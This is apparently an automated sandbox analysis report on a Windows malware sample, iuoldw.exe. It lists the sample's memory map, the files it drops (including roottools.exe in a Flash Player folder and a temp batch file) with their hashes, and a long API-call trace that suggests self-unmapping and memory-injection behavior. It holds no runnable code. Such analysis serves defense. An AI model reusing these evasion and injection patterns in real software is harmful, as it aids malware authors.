rsaenh.dll 0x74880000 0x748bafff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x748c0000 0x748d5fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x748e0000 0x748e7fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x748f0000 0x74901fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x74910000 0x74916fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74920000 0x7493bfff Memory Mapped File Readable, Writable, Executable False False False
sxs.dll 0x74940000 0x7499efff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x74eb0000 0x74eb4fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75890000 0x758c4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76b10000 0x76b54fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x77240000 0x77245fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 192.00 KB (196608 bytes) MD5: 71c63dd6822598c7f7c7ab4c9ceb6ba9
SHA1: 854db67ad532a4af63443f8e6f684762e3c9efca
SHA256: 99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083
False
c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat 0.20 KB (200 bytes) MD5: b1dd1aa15fb939d335f5c39a8ed85ab8
SHA1: 3ea3a7be8ec7b7cce6e9cc1b52c77199858119a6
SHA256: 8ba84a14936373863bb48478a9c13ac8d67e08ff26a4eb5c6bd88237587e6ffd
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv 1.73 KB (1776 bytes) MD5: f3963866cf1b0a9cae95cf0ec6aae77e
SHA1: 946fa1fe444c25648522407a7c690ea43e0d3837
SHA256: b4710fc930d2add348793b3160ed9c45b24ee8dcae605ee8ae198c107ef43285
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig 0.70 KB (720 bytes) MD5: 084cd34da60abfe463f4bcdf6ff6c7c4
SHA1: 376783a4491e556cf55f5b6d3f5ef8edcb6d4faa
SHA256: ceddead7e5868e0d0bd135ad23248b1c6562111ccb65bdba7e1cc37314c02712
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin 0.17 KB (171 bytes) MD5: 1142692290abc4073f6cb4f996e782fa
SHA1: d71b914d853ef1017dda3d6a0cbd29127aac5730
SHA256: 6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin 16.74 KB (17146 bytes) MD5: 18c3f549ae3ef0029f410aa06ca2ad50
SHA1: 2b599a6397db74b8e074dd3a38eb0d2aad8b3be9
SHA256: 4b2dba04ac1ce23a8d5c43f671a55182fdffb5e6a9366d0b019a1dae4afb7d53
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin 17.36 KB (17779 bytes) MD5: 734b4714f249866d6af2cd47b0929a3d
SHA1: 323502054d5c3e5294e62377d1626ed6261a4673
SHA256: c36c81a8858e6c68f06d494aa33406ce0c407d672b802f431d273877e507e05f
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin 18.96 KB (19413 bytes) MD5: e485ce36ccb80721109792301f591596
SHA1: 61e99372d88b5d6412a3e465316e9622c3ff25d4
SHA256: 68a132e520254be9c0f568603076331efc9b54e89f2eafc538a0397faaee5f06
False
Threads
Thread 0x8ec
(Host: 929, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75a05235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x76b60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x76bc70a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76b60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x76b73dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x76b707b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x76b91ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x76b78e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x76b77684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x76b7cc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x76ba903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x76b76231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x76b75fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x76b83f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x76b84e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x76badb72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x76b92a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x76bad737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x76bae015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x76bacc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x76bad1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x76bad48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x76bad4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x76bad509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x76b7e7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x76b7e496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x76b7ddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x76bad53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76bb2055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x76bb20ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76bb2151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x76bb21f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76bb2288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76bb2335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x76bb23d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76b85934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76b85a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x76b859b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x76bde405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x76bdef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x76bdf00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x76bdef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x76bdf15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x76bddbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x76bdecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x76bdea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x76bdd332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x76bdee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x76bdca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x76bdcc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x76bdcde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x76bdc802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x76bdec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x76bdd155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x76b7b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x76b95f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x76b84fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x76b80d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x76b959ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x76b6f8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75499d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75460782 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x74940000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74987685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x757a7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x757b3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x757ce7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x757b5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x757b451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x757b4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 2302108 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Langskallet7, wndproc_parameter = 0 True 1
Fn
Module Load module_name = KERNEL32 , base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x75a1cfcc True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a80efd True 1
Fn
Module Load module_name = shell32, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x75e98af2 True 1
Fn
Module Load module_name = NTDLL, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x7728fb18 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff True 1
Fn
Module Load module_name = user32, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x757b0a19 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 True 1
Fn
Module Load module_name = ntdll, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x7728ff2c True 1
Fn
System Sleep duration = 15 milliseconds (0.015 seconds) True 32
Fn
Module Load module_name = ntdll, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77290028 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x75a053c6 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x75a0196e True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75a01826 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a845bf True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a8437f True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75a1d802 True 1
Fn
Module Load module_name = IPHlpApi, base_address = 0x74920000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x74929263 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 True 1
Fn
Module Load module_name = shell32, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x75e97078 True 1
Fn
Module Load module_name = User32, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x757ad1cf True 1
Fn
Module Load module_name = user32, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 True 1
Fn
Module Load module_name = user32, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x757b3961 True 1
Fn
Module Unmap process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75a07a2f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75a049d7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x75a089b3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x772b1f6e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75a110b5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75a034d5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x75a035b7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75a02d3c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x772a45f5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75a0dd0e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x75a05a7e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75a0103d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75a0170d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75a01400 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x75a05a96 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x75a1d9c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x75a2d075 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
